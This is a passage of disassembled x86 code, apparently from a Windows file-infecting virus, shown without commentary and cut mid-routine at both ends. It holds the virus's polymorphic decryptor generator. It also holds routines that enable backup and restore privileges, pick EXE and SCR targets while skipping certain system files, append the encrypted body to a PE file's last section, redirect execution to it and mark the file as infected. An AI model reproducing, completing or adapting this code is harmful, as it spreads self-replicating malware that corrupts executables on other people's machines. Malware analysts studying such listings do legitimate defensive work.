mov ax, 0F081h
test dword ptr [ebp+1039C0h], 200h
jnz short loc_40BC20
mov ah, 0C8h
loc_40BC20: ; CODE XREF: __u_____:0040BC1C�j
or ah, [ebp+1039B9h]
stosw
loc_40BC28: ; CODE XREF: __u_____:0040BBE9�j
mov [ebp+1042E4h], edi
mov eax, 29CCh
stosd
test dword ptr [ebp+1039C0h], 8
jz short loc_40BCB1
call sub_40B841
test dword ptr [ebp+1039C0h], 400h
jnz short loc_40BC5C
mov al, 0B8h
or al, [ebp+1039BAh]
stosb
jmp short loc_40BCA9
; ---------------------------------------------------------------------------
loc_40BC5C: ; CODE XREF: __u_____:0040BC4F�j
test dword ptr [ebp+1039C0h], 800h
jnz short loc_40BC79
mov ax, 0E083h
or ah, [ebp+1039BAh]
stosw
xor eax, eax
stosb
jmp short loc_40BC8E
; ---------------------------------------------------------------------------
loc_40BC79: ; CODE XREF: __u_____:0040BC66�j
mov ax, 1829h
or ah, [ebp+1039BAh]
shl ah, 3
or ah, [ebp+1039BAh]
stosw
loc_40BC8E: ; CODE XREF: __u_____:0040BC77�j
test dword ptr [ebp+1039C0h], 1000h
mov ax, 0C081h
jz short loc_40BCA1
add ah, 8
loc_40BCA1: ; CODE XREF: __u_____:0040BC9C�j
or ah, [ebp+1039BAh]
stosw
loc_40BCA9: ; CODE XREF: __u_____:0040BC5A�j
movzx eax, byte ptr [ebp+1039BEh]
stosd
loc_40BCB1: ; CODE XREF: __u_____:0040BC3E�j
call sub_40B841
test dword ptr [ebp+1039C0h], 40000000h
jz short loc_40BCD0
mov al, 50h
add al, [ebp+1039B8h]
stosb
call sub_40B841
loc_40BCD0: ; CODE XREF: __u_____:0040BCC0�j
lea ecx, [edi-2]
mov [ebp+1042CCh], ecx
test dword ptr [ebp+1039C0h], 80000000h
jz short loc_40BCFC
mov al, 0E8h
stosb
mov eax, [ebp+1042F0h]
sub eax, edi
sub eax, 4
stosd
mov [ebp+1042F0h], edi
jmp short loc_40BD01
; ---------------------------------------------------------------------------
loc_40BCFC: ; CODE XREF: __u_____:0040BCE3�j
call sub_40B8B3
loc_40BD01: ; CODE XREF: __u_____:0040BCFA�j
call sub_40B841
test dword ptr [ebp+1039C0h], 10000h
jnz short loc_40BD1D
mov al, 40h
or al, [ebp+1039B8h]
stosb
jmp short loc_40BD2C
; ---------------------------------------------------------------------------
loc_40BD1D: ; CODE XREF: __u_____:0040BD10�j
mov ax, 0C083h
or ah, [ebp+1039B8h]
stosw
mov al, 1
stosb
loc_40BD2C: ; CODE XREF: __u_____:0040BD1B�j
test dword ptr [ebp+1039C0h], 20000h
jnz short loc_40BD67
test dword ptr [ebp+1039C0h], 40000h
jnz short loc_40BD5E
mov al, 0C0h
or al, [ebp+1039BAh]
mov ah, [ebp+1039BFh]
shl eax, 10h
mov ax, 8166h
stosd
mov al, 0
jmp short loc_40BD66
; ---------------------------------------------------------------------------
loc_40BD5E: ; CODE XREF: __u_____:0040BD42�j
mov al, 40h
or al, [ebp+1039BAh]
loc_40BD66: ; CODE XREF: __u_____:0040BD5C�j
stosb
loc_40BD67: ; CODE XREF: __u_____:0040BD36�j
test dword ptr [ebp+1039C0h], 80000h
jnz short loc_40BD83
mov ax, 0E883h
or ah, [ebp+1039B9h]
stosw
mov al, 1
jmp short loc_40BD8B
; ---------------------------------------------------------------------------
loc_40BD83: ; CODE XREF: __u_____:0040BD71�j
mov al, 48h
or al, [ebp+1039B9h]
loc_40BD8B: ; CODE XREF: __u_____:0040BD81�j
stosb
call sub_40B841
test dword ptr [ebp+1039C0h], 100000h
mov cl, 75h
jnz short loc_40BDC4
mov ax, 0F883h
or ah, [ebp+1039B9h]
stosw
xor eax, eax
stosb
sub [ebp+1042CCh], edi
test dword ptr [ebp+1039C0h], 200000h
jnz short loc_40BDDF
mov cl, 77h
jmp short loc_40BDDF
; ---------------------------------------------------------------------------
loc_40BDC4: ; CODE XREF: __u_____:0040BD9D�j
mov ax, 1809h
or ah, [ebp+1039B9h]
shl ah, 3
or ah, [ebp+1039B9h]
stosw
sub [ebp+1042CCh], edi
loc_40BDDF: ; CODE XREF: __u_____:0040BDBE�j
; __u_____:0040BDC2�j
mov al, cl
mov ah, [ebp+1042CCh]
stosw
mov al, 58h
add al, [ebp+1039B8h]
stosb
call sub_40B841
test dword ptr [ebp+1039C0h], 2000003h
jz short loc_40BE2F
test dword ptr [ebp+1039C0h], 8000000h
jnz short loc_40BE2F
test dword ptr [ebp+1039C0h], 6000000h
jnz short loc_40BE25
call sub_40B7CF
call sub_40B841
loc_40BE25: ; CODE XREF: __u_____:0040BE19�j
call sub_40B7FB
call sub_40B841
loc_40BE2F: ; CODE XREF: __u_____:0040BE01�j
; __u_____:0040BE0D�j
test dword ptr [ebp+1039C0h], 10000000h
jz short loc_40BE43
mov al, 0C9h
stosb
call sub_40B841
loc_40BE43: ; CODE XREF: __u_____:0040BE39�j
test dword ptr [ebp+1039C0h], 400000h
jz short loc_40BE79
mov al, 7
sub al, [ebp+1039B8h]
shl eax, 1Ah
or eax, 240889h
add ah, [ebp+1039B8h]
shl ah, 3
add ah, 4
stosd
call sub_40B841
mov al, 61h
stosb
call sub_40B841
loc_40BE79: ; CODE XREF: __u_____:0040BE4D�j
mov ax, 0E0FFh
or ah, [ebp+1039B8h]
stosw
call sub_40B841
test dword ptr [ebp+1039C0h], 20h
jz short loc_40BF05
test dword ptr [ebp+1039C0h], 80000000h
jz short loc_40BEC1
mov eax, edi
mov ecx, [ebp+1042F0h]
sub eax, ecx
mov [ecx-4], eax
call sub_40B8B3
call sub_40B841
mov al, 0C3h
stosb
call sub_40B841
loc_40BEC1: ; CODE XREF: __u_____:0040BEA0�j
mov eax, edi
mov ecx, [ebp+1042C4h]
sub eax, ecx
mov [ecx-4], eax
mov al, 58h
or al, [ebp+1039B8h]
stosb
call sub_40B841
test dword ptr [ebp+1039C0h], 800000h
jz short loc_40BEF4
mov ax, 0C350h
or al, [ebp+1039B8h]
jmp short loc_40BEFE
; ---------------------------------------------------------------------------
loc_40BEF4: ; CODE XREF: __u_____:0040BEE6�j
mov ax, 0E0FFh
or ah, [ebp+1039B8h]
loc_40BEFE: ; CODE XREF: __u_____:0040BEF2�j
stosw
call sub_40B841
loc_40BF05: ; CODE XREF: __u_____:0040BE94�j
test dword ptr [ebp+1039C0h], 2000003h
jz short loc_40BF70
mov ecx, edi
mov eax, [ebp+1042DCh]
sub ecx, eax
mov [eax-4], ecx
xor ecx, ecx
test dword ptr [ebp+1039C0h], 1000000h
jnz short loc_40BF3A
lea eax, [ebp+1039B8h]
loc_40BF32: ; CODE XREF: __u_____:0040BF38�j
mov cl, [eax]
inc eax
cmp cl, 3
jnb short loc_40BF32
loc_40BF3A: ; CODE XREF: __u_____:0040BF2A�j
lea eax, ds:102444h[ecx*8]
shl eax, 8
mov al, 8Bh
stosd
jecxz short loc_40BF4F
mov ax, 0C031h
stosw
loc_40BF4F: ; CODE XREF: __u_____:0040BF47�j
mov ax, 808Fh
push 0B8h
add ah, cl
stosw
pop eax
stosd
test ecx, ecx
jnz short loc_40BF68
mov ax, 0C031h
stosw
loc_40BF68: ; CODE XREF: __u_____:0040BF60�j
mov al, 0C3h
stosb
call sub_40B841
loc_40BF70: ; CODE XREF: __u_____:0040BF0F�j
lea eax, [ebp+1039CCh]
test dword ptr [ebp+1039C0h], 20000000h
jnz short loc_40BF88
push edi
sub edi, eax
pop eax
jmp short loc_40BFA1
; ---------------------------------------------------------------------------
loc_40BF88: ; CODE XREF: __u_____:0040BF80�j
mov edx, [ebx+28h]
sub edi, eax
sub edx, eax
mov ecx, [ebp+1042E4h]
add [ebp+1042C4h], edx
add [ecx], edi
mov eax, [esp+4]
loc_40BFA1: ; CODE XREF: __u_____:0040BF86�j
mov [ebp+101069h], edi
mov edi, [ebp+1042C8h]
sub eax, [ebp+1042C4h]
test dword ptr [ebp+1039C0h], 40h
jz short loc_40BFC1
neg eax
loc_40BFC1: ; CODE XREF: __u_____:0040BFBD�j
stosd
retn 4
; =============== S U B R O U T I N E =======================================
sub_40BFC5 proc near ; CODE XREF: sub_40C52F+336�p
push esi
push edi
cmp dword ptr [ebp+104300h], 0
jz loc_40C1AD
call near ptr loc_40BFE5+1
dec ebx
inc ebp
push edx
dec esi
inc ebp
dec esp
xor esi, [edx]
db 2Eh
inc esp
dec esp
dec esp
loc_40BFE5: ; CODE XREF: sub_40BFC5+F�p
add bh, bh
sub_40BFC5 endp ; sp-analysis failed
xchg eax, ebp
scasb
db 3Eh
adc [eax], al
mov [ebp+104314h], eax
push ebx
mov ebx, [eax+3Ch]
add ebx, eax
push dword ptr [ebx+28h]
mov eax, [ebx+34h]
call sub_40B4E8
mov edx, [ebp+1042F4h]
pop ebx
add eax, [edx+0Ch]
mov [ebp+104318h], eax
add eax, [edx+8]
mov [ebp+10431Ch], eax
mov esi, [ebx+28h]
push dword ptr [ebx+80h]
call sub_40B4E8
mov edi, [ebp+1042F4h]
push esi
call sub_40B4E8
mov edx, [ebp+1042F4h]
mov ecx, [edx+8]
add ecx, [edx+0Ch]
sub ecx, esi
sub ecx, 5
js loc_40C1AD
jz loc_40C1AD
add esi, [ebp+1042F8h]
add esi, [ebp+1042B4h]
; START OF FUNCTION CHUNK FOR sub_40C17E
loc_40C05F: ; CODE XREF: sub_40C17E+29�j
lodsb
cmp al, 0E8h
jnz loc_40C10A
lea eax, [esi+4]
sub eax, [ebp+1042B4h]
add eax, [esi]
push eax
call sub_40B4E8
cmp dword ptr [ebp+1042F4h], 0
jnz short loc_40C08D
cmp eax, [edi+0Ch]
jnb loc_40C1A6
jmp short loc_40C099
; ---------------------------------------------------------------------------
loc_40C08D: ; CODE XREF: sub_40C17E-FE�j
cmp [ebp+1042F4h], edx
jnz loc_40C1A6
loc_40C099: ; CODE XREF: sub_40C17E-F3�j
add eax, [ebp+1042B4h]
cmp word ptr [eax], 25FFh
jnz loc_40C1A6
mov eax, [eax+2]
sub eax, [ebx+34h]
push eax
call sub_40B4E8
cmp [ebp+1042F4h], edi
jnz loc_40C1A6
add eax, [ebp+1042F8h]
add eax, [ebp+1042B4h]
mov eax, [eax]
sub eax, [edi+0Ch]
jb loc_40C1A6
cmp eax, [edi+8]
jnb loc_40C1A6
loc_40C0E2: ; CODE XREF: sub_40C17E+22�j
add eax, 2
add eax, [edi+14h]
add eax, [ebp+1042B4h]
push edx
push eax
push dword ptr [ebp+104314h]
call dword ptr [ebp+103E6Eh]
pop edx
test eax, eax
jnz loc_40C1BC
jmp loc_40C1A6
; ---------------------------------------------------------------------------
loc_40C10A: ; CODE XREF: sub_40C17E-11C�j
cmp al, 0FFh
jnz loc_40C1A6
cmp byte ptr [esi], 15h
jnz loc_40C1A6
mov eax, [esi+1]
sub eax, [ebx+34h]
push eax
call sub_40B4E8
cmp [ebp+1042F4h], edi
jnz short loc_40C1A6
add eax, [ebp+1042F8h]
add eax, [ebp+1042B4h]
mov [ebp+104320h], eax
mov eax, [eax]
cmp eax, [ebp+104318h]
jb short loc_40C153
cmp eax, [ebp+10431Ch]
jb short loc_40C1BC
loc_40C153: ; CODE XREF: sub_40C17E-35�j
cmp eax, 70000000h
jb short loc_40C191
call sub_40C17E
lea ecx, [esi-4]
mov eax, ecx
sub eax, [edx]
add eax, [edx+10h]
cmp eax, [ebp+104320h]
jnz short locret_40C17D
add esp, 10h
push dword ptr [ecx]
pop [esp-0Ch+arg_24]
popa
jmp short loc_40C198
; ---------------------------------------------------------------------------
locret_40C17D: ; CODE XREF: sub_40C17E-F�j
retn
; END OF FUNCTION CHUNK FOR sub_40C17E
; =============== S U B R O U T I N E =======================================
sub_40C17E proc near ; CODE XREF: sub_40C17E-24�p
var_8 = dword ptr -8
arg_0 = dword ptr 4
arg_24 = dword ptr 28h
; FUNCTION CHUNK AT 0040C05F SIZE 0000011F BYTES
pop dword ptr [ebp+1042D4h]
pusha
mov esi, [ebp+1042B4h]
call sub_40B5EF
popa
loc_40C191: ; CODE XREF: sub_40C17E-26�j
test eax, 80000000h
jnz short loc_40C1A6
loc_40C198: ; CODE XREF: sub_40C17E-3�j
sub eax, [edi+0Ch]
jb short loc_40C1A6
cmp eax, [edi+8]
jb loc_40C0E2
loc_40C1A6: ; CODE XREF: sub_40C17E-F9�j
; sub_40C17E-EB�j ...
dec ecx
jnz loc_40C05F
loc_40C1AD: ; CODE XREF: sub_40BFC5+9�j
; __u_____:0040C047�j ...
mov edi, [esp-4+arg_0]
and dword ptr [edi+29C0h], 0FFBFFFFFh
jmp short loc_40C1FE
; ---------------------------------------------------------------------------
loc_40C1BC: ; CODE XREF: sub_40C17E-7F�j
; sub_40C17E-2D�j
or dword ptr [edx+24h], 0E0000060h
dec esi
xor eax, eax
mov ecx, [esp+8+var_8]
xchg eax, [ebp+104300h]
mov [ebp+1042FCh], eax
lea edi, [ecx+29C4h]
add eax, [ebp+1042B4h]
movsw
movsd
dec esi
sub eax, esi
add eax, [edx+14h]
sub eax, [edx+0Ch]
mov byte ptr [esi-5], 0E8h
mov dword ptr [ecx+54h], 5
mov [esi-4], eax
loc_40C1FE: ; CODE XREF: sub_40C17E+3C�j
pop edi
pop esi
retn
sub_40C17E endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40C201 proc near ; CODE XREF: __u_____:0040C502�p
; FUNCTION CHUNK AT 0040C32B SIZE 00000002 BYTES
push edi
call dword ptr [ebp+103EBAh]
shr eax, 1Fh
jnz loc_40C32B
push eax
push esp
push 28h
push 0FFFFFFFFh
call dword ptr [ebp+103F1Ah]
test eax, eax
pop edi
js loc_40C32B
call sub_40A683
call near ptr loc_40C23C+5
push ebx
db 65h
jz short near ptr unk_40C27A
imul ebp, [ebp+53h], 72756365h
loc_40C23C: ; CODE XREF: sub_40C201+2A�p
imul esi, [ecx+edi*2+41h], 88B5FF00h
sub_40C201 endp ; sp-analysis failed
inc edx
adc [eax], al
call dword ptr [ebp+103E6Eh]
mov [ebp+104290h], eax
call near ptr loc_40C270+1
push ebx
db 65h
push esp
popa
imul esp, [ebp+4Fh], 77h
outsb
db 65h
jb short loc_40C2D7
push 72507069h
imul esi, [esi+69h], 6567656Ch
loc_40C270: ; CODE XREF: __u_____:0040C253�p
add [edi-18h], dl
sub eax, ebp
; ---------------------------------------------------------------------------
db 0FFh
db 0FFh
db 0E8h ; è
db 13h
db 0
unk_40C27A db 0 ; CODE XREF: sub_40C201+30�j
db 0
db 53h ; S
db 65h ; e
db 52h ; R
db 65h ; e
db 73h ; s
db 74h ; t
db 6Fh ; o
db 72h ; r
db 65h ; e
db 50h ; P
db 72h ; r
db 69h ; i
db 76h ; v
db 69h ; i
db 6Ch ; l
db 65h ; e
db 67h ; g
db 65h ; e
db 0
db 57h ; W
db 0E8h ; è
db 0Bh
db 0E8h ; è
db 0FFh
db 0FFh
db 0E8h ; è
db 12h
db 0
db 0
db 0
db 53h ; S
db 65h ; e
db 42h ; B
db 61h ; a
db 63h ; c
db 6Bh ; k
db 75h ; u
db 70h ; p
db 50h ; P
db 72h ; r
db 69h ; i
db 76h ; v
db 69h ; i
db 6Ch ; l
db 65h ; e
db 67h ; g
db 65h ; e
db 0
db 57h ; W
db 0E8h ; è
db 0EEh ; î
db 0E7h ; ç
db 0FFh
db 0FFh
db 0E8h ; è
db 18h
db 0
db 0
db 0
db 53h ; S
db 65h ; e
db 43h ; C
db 68h ; h
db 61h ; a
db 6Eh ; n
db 67h ; g
db 65h ; e
db 4Eh ; N
db 6Fh ; o
db 74h ; t
db 69h ; i
db 66h ; f
db 79h ; y
db 50h ; P
db 72h ; r
db 69h ; i
db 76h ; v
db 69h ; i
db 6Ch ; l
db 65h ; e
db 67h ; g
db 65h ; e
db 0
db 57h ; W
db 0E8h ; è
db 0CBh ; Ë
db 0E7h ; ç
db 0FFh
db 0FFh
db 50h ; P
db 54h ; T
; ---------------------------------------------------------------------------
loc_40C2D7: ; CODE XREF: __u_____:0040C261�j
lea eax, [ebp+103DCCh]
push 64h
push eax
push 1
push edi
call dword ptr [ebp+103F26h]
mov [esp], edi
call dword ptr [ebp+103E62h]
sub al, al
lea edi, [ebp+104184h]
push eax
push eax
push eax
push dword ptr [ebp+103DCCh]
push 40001h
push esp
push 1
push edi
call dword ptr [ebp+104290h]
push esp
push 4
push edi
call dword ptr [ebp+104290h]
add esp, 14h
push dword ptr [ebp+104288h]
call dword ptr [ebp+103E9Eh]
; START OF FUNCTION CHUNK FOR sub_40C201
loc_40C32B: ; CODE XREF: sub_40C201+A�j
; sub_40C201+1F�j
pop edi
retn
; END OF FUNCTION CHUNK FOR sub_40C201
; =============== S U B R O U T I N E =======================================
sub_40C32D proc near ; CODE XREF: __u_____:0040C4FB�p
; __u_____:0040C507�p ...
lea esi, [ebp+104184h]
push esi
call dword ptr [ebp+103EA2h]
cmp eax, 0FFFFFFFFh
jz locret_40C3FE
mov [ebp+104294h], eax
push 0
push esi
call dword ptr [ebp+103EDEh]
test eax, eax
jz locret_40C3FE
sub eax, eax
push eax
push eax
push 3
push eax
push 1
push 0C0000000h
push esi
call dword ptr [ebp+103E7Eh]
cmp eax, 0FFFFFFFFh
jz loc_40C97F
mov [ebp+104298h], eax
lea ecx, [ebp+10429Ch]
lea edx, [ebp+1042A4h]
push ecx
push edx
push 0
push eax
call dword ptr [ebp+103EAAh]
cmp eax, 0FFFFFFFFh
jz loc_40C973
push 0
push dword ptr [ebp+104298h]
call dword ptr [ebp+103EA6h]
cmp eax, 0FFFFFFFFh
jz loc_40C973
mov [ebp+1042ACh], eax
xor ecx, ecx
add eax, ebx
push ecx
push eax
push ecx
push 4
push ecx
push dword ptr [ebp+104298h]
call dword ptr [ebp+103E82h]
test eax, eax
jz loc_40C973
xor ecx, ecx
mov [ebp+1042B0h], eax
push ecx
push ecx
push ecx
push 0F001Fh
push eax
call dword ptr [ebp+103ECAh]
test eax, eax
jz loc_40C94B
mov [ebp+1042B4h], eax
locret_40C3FE: ; CODE XREF: sub_40C32D+10�j
; sub_40C32D+27�j ...
retn
sub_40C32D endp
; ---------------------------------------------------------------------------
loc_40C3FF: ; CODE XREF: sub_40C52F+188�p
; sub_40C52F+2A0�p
mov eax, 7327h
mov ecx, [ebx+38h]
; ---------------------------------------------------------------------------
db 0F7h ; ÷
db 85h ; …
db 0C0h ; À
db 39h ; 9
db 10h
db 0
db 0
db 0
db 0
; ---------------------------------------------------------------------------
and [ebp+6], dh
add eax, [ebp+101069h]
xor edx, edx
add eax, ecx
div ecx
mul ecx
mov [ebp+1042C0h], eax
mov eax, 29CBh
mov ecx, [ebx+3Ch]
add eax, [ebp+101069h]
xor edx, edx
add eax, ecx
div ecx
mul ecx
mov [ebp+1042B8h], eax
retn
; =============== S U B R O U T I N E =======================================
sub_40C444 proc near ; CODE XREF: sub_40C52F:loc_40C5A4�p
; sub_40C52F+1B4�p
movzx ecx, word ptr [ebx+6]
stc
loc_40C449: ; CODE XREF: sub_40C444+23�j
jecxz short locret_40C480
lea edx, [ebx+18h]
movzx eax, word ptr [ebx+14h]
add edx, eax
dec ecx
imul eax, ecx, 28h
add edx, eax
cmp dword ptr [edx], 6E69775Fh
stc
jz short locret_40C480
cmp dword ptr [edx+0Ch], 1
jb short loc_40C449
mov ecx, [ebx+3Ch]
mov eax, [edx+14h]
add eax, [edx+10h]
lea eax, [eax+ecx*2-1]
neg ecx
and eax, ecx
cmp eax, [ebp+1042ACh]
locret_40C480: ; CODE XREF: sub_40C444:loc_40C449�j
; sub_40C444+1D�j ...
retn
sub_40C444 endp
; =============== S U B R O U T I N E =======================================
sub_40C481 proc near ; CODE XREF: __u_____:0040C519�p
arg_C = dword ptr 10h
mov edx, [esp+arg_C]
xor eax, eax
pop dword ptr [edx+0B8h]
retn
sub_40C481 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_40C48E: ; CODE XREF: __u_____:0040C4AF�j
mov ecx, edi
jmp short loc_40C49D
; ---------------------------------------------------------------------------
lea edi, [ebp+104184h]
cld
loc_40C499: ; CODE XREF: __u_____:0040C4AB�j
mov ebx, edi
xor ecx, ecx
loc_40C49D: ; CODE XREF: __u_____:0040C490�j
; __u_____:0040C4B3�j
lodsb
cmp al, 61h
jb short loc_40C4A8
cmp al, 7Ah
ja short loc_40C4A8
sub al, 20h
loc_40C4A8: ; CODE XREF: __u_____:0040C4A0�j
; __u_____:0040C4A4�j
stosb
cmp al, 5Ch
jz short loc_40C499
cmp al, 2Eh
jz short loc_40C48E
cmp al, 0
jnz short loc_40C49D
jecxz short locret_40C480
mov eax, [ecx]
cmp eax, 455845h
jz short loc_40C4CB
cmp eax, 524353h
jnz locret_40C3FE
loc_40C4CB: ; CODE XREF: __u_____:0040C4BE�j
mov eax, [ebx]
cmp eax, 434E4957h
jz locret_40C3FE
cmp eax, 4E554357h
jz locret_40C3FE
cmp eax, 32334357h
jz locret_40C3FE
cmp eax, 4F545350h
jz locret_40C3FE
xor ebx, ebx
call sub_40C32D
jnz short loc_40C512
call sub_40C201
call sub_40C32D
jz locret_40C3FE
loc_40C512: ; CODE XREF: __u_____:0040C500�j
xor edx, edx
call sub_40C52F
call sub_40C481
call $+5
pop ebp
sub ebp, 10344Fh
jmp loc_40C929
; =============== S U B R O U T I N E =======================================
sub_40C52F proc near ; CODE XREF: __u_____:0040C514�p
var_14 = dword ptr -14h
push dword ptr fs:[edx]
mov esi, [ebp+1042B4h]
mov fs:[edx], esp
cmp word ptr [esi], 5A4Dh
jnz loc_40C929
mov ebx, [esi+3Ch]
add ebx, esi
cmp word ptr [ebx], 4550h
jnz loc_40C929
test dword ptr [ebx+16h], 2000h
jnz loc_40C929
test byte ptr [ebx+5Ch], 2
jz loc_40C929
mov eax, [ebx+8]
cmp eax, 0A0A0A0A0h
jz loc_40C929
cmp eax, 20202020h
jz loc_40C929
mov ecx, [ebx+0C8h]
jecxz short loc_40C5A4
push ecx
call sub_40B4E8
add ecx, [ebp+1042F8h]
add ecx, esi
and dword ptr [ecx+40h], 0
and dword ptr [ecx+44h], 0
loc_40C5A4: ; CODE XREF: sub_40C52F+5D�j
call sub_40C444
jb loc_40C929
and dword ptr [ebp+1042FCh], 0
mov eax, [edx+8]
mov ecx, [edx+10h]
sub eax, ecx
jnb short loc_40C5C4
xor eax, eax
jmp short loc_40C5C9
; ---------------------------------------------------------------------------
loc_40C5C4: ; CODE XREF: sub_40C52F+8F�j
add ecx, eax
mov [edx+10h], ecx
loc_40C5C9: ; CODE XREF: sub_40C52F+93�j
mov [ebp+1042BCh], eax
add ecx, [edx+0Ch]
mov eax, 10000h
push ecx
call near ptr dword_40AC24+43h
xor [ebp+1039BEh], dl
mov cl, 20h
xor [ebp+1039BFh], dh
loc_40C5EB: ; CODE XREF: sub_40C52F+D5�j
push 20h
dec cl
pop eax
js short loc_40C606
call near ptr dword_40AC24+43h
test edx, edx
setz dl
shl edx, cl
xor [ebp+1039C0h], edx
jmp short loc_40C5EB
; ---------------------------------------------------------------------------
loc_40C606: ; CODE XREF: sub_40C52F+C1�j
test dword ptr [ebp+1039C0h], 2000000h
jz short loc_40C634
test dword ptr [ebp+1039C0h], 3
jnz short loc_40C62A
and dword ptr [ebp+1039C0h], 0F7FFFFFFh
jmp short loc_40C634
; ---------------------------------------------------------------------------
loc_40C62A: ; CODE XREF: sub_40C52F+ED�j
or dword ptr [ebp+1039C0h], 10000000h
loc_40C634: ; CODE XREF: sub_40C52F+E1�j
; sub_40C52F+F9�j ...
push 6
pop ecx
loc_40C63A: ; CODE XREF: sub_40C52F+129�j
push 6
pop eax
call near ptr dword_40AC24+43h
mov al, [ebp+1039B8h]
xchg al, [edx+ebp+1039B8h]
mov [ebp+1039B8h], al
loop loc_40C63A
test dword ptr [ebp+1039C0h], 8
jnz short loc_40C66F
cmp byte ptr [ebp+1039BAh], 1
jz short loc_40C634
loc_40C66F: ; CODE XREF: sub_40C52F+135�j
test dword ptr [ebp+1039C0h], 10000000h
jz short loc_40C696
cmp byte ptr [ebp+1039B8h], 5
jz short loc_40C634
cmp byte ptr [ebp+1039B9h], 5
jz short loc_40C634
cmp byte ptr [ebp+1039BAh], 5
jz short loc_40C634
loc_40C696: ; CODE XREF: sub_40C52F+14A�j
test dword ptr [ebp+1039C0h], 400000h
jz short loc_40C6AB
cmp byte ptr [ebp+1039B8h], 2
ja short loc_40C634
loc_40C6AB: ; CODE XREF: sub_40C52F+171�j
and dword ptr [ebp+104300h], 0
call loc_40B929
call loc_40C3FF
call sub_40C932
mov ebx, [ebp+1042B8h]
add ebx, [ebp+1042BCh]
call sub_40C32D
jz loc_40C929
mov esi, [ebp+1042B4h]
mov ebx, [esi+3Ch]
add ebx, esi
call sub_40C444
jb loc_40C929
or dword ptr [edx+24h], 0E0000060h
mov edi, esi
push edx
push esi
add edi, [edx+14h]
add edi, [edx+10h]
test dword ptr [ebp+1039C0h], 20000000h
jnz short loc_40C71F
mov [ebp+104304h], edi
lea esi, [ebp+1039CCh]
mov ecx, [ebp+101069h]
rep movsb
loc_40C71F: ; CODE XREF: sub_40C52F+1DA�j
push edi
mov ecx, 0A73h
lea esi, [ebp+101000h]
rep movsd
mov cl, 0
jecxz short loc_40C733
rep movsb
loc_40C733: ; CODE XREF: sub_40C52F+200�j
test dword ptr [ebp+1039C0h], 20000000h
jz loc_40C7F1
push dword ptr [ebx+28h]
call sub_40B4E8
mov edx, [ebp+1042F4h]
test edx, edx
jz loc_40C7F1
mov esi, [ebp+1042B4h]
mov ecx, [edx+10h]
or dword ptr [edx+24h], 0E0000060h
sub ecx, [edx+8]
jnb short loc_40C770
xor ecx, ecx
loc_40C770: ; CODE XREF: sub_40C52F+23D�j
add esi, [edx+14h]
cmp ecx, [ebp+101069h]
mov ecx, [ebp+101069h]
jb short loc_40C7D7
mov edi, [esp+14h+var_14]
and dword ptr [ebp+101069h], 0
and dword ptr [edi+69h], 0
mov edi, [edx+8]
add [edx+8], ecx
add esi, edi
xchg esi, edi
mov eax, [ebp+1042C8h]
test dword ptr [ebp+1039C0h], 40h
jz short loc_40C7B0
neg dword ptr [eax]
loc_40C7B0: ; CODE XREF: sub_40C52F+27D�j
add esi, [edx+0Ch]
sub [eax], esi
mov [ebp+104300h], esi
mov esi, [ebx+28h]
add [eax], esi
test dword ptr [ebp+1039C0h], 40h
jz short loc_40C7CE
neg dword ptr [eax]
loc_40C7CE: ; CODE XREF: sub_40C52F+29B�j
push ecx
call loc_40C3FF
pop ecx
jmp short loc_40C7E3
; ---------------------------------------------------------------------------
loc_40C7D7: ; CODE XREF: sub_40C52F+250�j
add esi, [ebx+28h]
sub esi, [edx+0Ch]
push ecx
push esi
rep movsb
pop edi
pop ecx
loc_40C7E3: ; CODE XREF: sub_40C52F+2A6�j
lea esi, [ebp+1039CCh]
mov [ebp+104304h], edi
rep movsb
loc_40C7F1: ; CODE XREF: sub_40C52F+20E�j
; sub_40C52F+224�j
pop edi
pop esi
rdtsc
xchg eax, edx
lea eax, [edi+137h]
cmp dl, [ebp+1039BEh]
jnz short loc_40C80A
imul edx, 12345678h
loc_40C80A: ; CODE XREF: sub_40C52F+2D3�j
mov [eax-19h], dx
call sub_40A1F4
pop edx
mov ecx, [edx+0Ch]
add ecx, [edx+10h]
test dword ptr [ebp+1039C0h], 20000000h
lea eax, [ecx+5]
jnz short loc_40C83C
mov [ebp+104300h], ecx
add eax, [ebp+101069h]
and dword ptr [edi+69h], 0
loc_40C83C: ; CODE XREF: sub_40C52F+2F8�j
sub eax, [ebx+28h]
mov [edi+54h], eax
test dword ptr [ebp+103F7Ch], 1
jz short loc_40C858
mov dword ptr [ebx+8], 0A0A0A0A0h
loc_40C858: ; CODE XREF: sub_40C52F+320�j
test dword ptr [ebp+1039C0h], 400000h
jz short loc_40C86B
push edx
call sub_40BFC5
pop edx
loc_40C86B: ; CODE XREF: sub_40C52F+333�j
mov ecx, [ebp+104300h]
jecxz short loc_40C878
mov [ebx+28h], ecx
jmp short loc_40C885
; ---------------------------------------------------------------------------
loc_40C878: ; CODE XREF: sub_40C52F+342�j
mov ecx, [ebp+1042FCh]
jecxz short loc_40C882
jmp short loc_40C885
; ---------------------------------------------------------------------------
loc_40C882: ; CODE XREF: sub_40C52F+34F�j
mov ecx, [ebx+28h]
loc_40C885: ; CODE XREF: sub_40C52F+347�j
; sub_40C52F+351�j
test dword ptr [ebp+1039C0h], 3
jz short loc_40C8A5
mov eax, [ebp+104304h]
add ecx, [ebp+1042ECh]
add eax, [ebp+1042E8h]
add [eax], ecx
loc_40C8A5: ; CODE XREF: sub_40C52F+360�j
mov ecx, [edx+10h]
mov eax, [ebp+1042B8h]
cmp [edx+8], ecx
jnb short loc_40C8B6
mov [edx+8], ecx
loc_40C8B6: ; CODE XREF: sub_40C52F+382�j
add [edx+10h], eax
and dword ptr [ebx+58h], 0
mov eax, [ebp+1042C0h]
push 29CCh
add [edx+8], eax
pop ecx
add [ebx+50h], eax
mov dl, [ebp+1039BEh]
test dword ptr [ebp+1039C0h], 20000000h
jz short loc_40C8E7
add ecx, [ebp+101069h]
loc_40C8E7: ; CODE XREF: sub_40C52F+3B0�j
mov dh, 0
test dword ptr [ebp+1039C0h], 20000h
jnz short loc_40C909
inc dh
test dword ptr [ebp+1039C0h], 40000h
jnz short loc_40C909
mov dh, [ebp+1039BFh]
loc_40C909: ; CODE XREF: sub_40C52F+3C4�j
; sub_40C52F+3D2�j
test dword ptr [ebp+1039C0h], 4000h
jnz short loc_40C920
loc_40C915: ; CODE XREF: sub_40C52F+3ED�j
mov al, [edi]
add al, dl
stosb
add dl, dh
loop loc_40C915
jmp short loc_40C929
; ---------------------------------------------------------------------------
loc_40C920: ; CODE XREF: sub_40C52F+3E4�j
; sub_40C52F+3F8�j
mov al, [edi]
xor al, dl
stosb
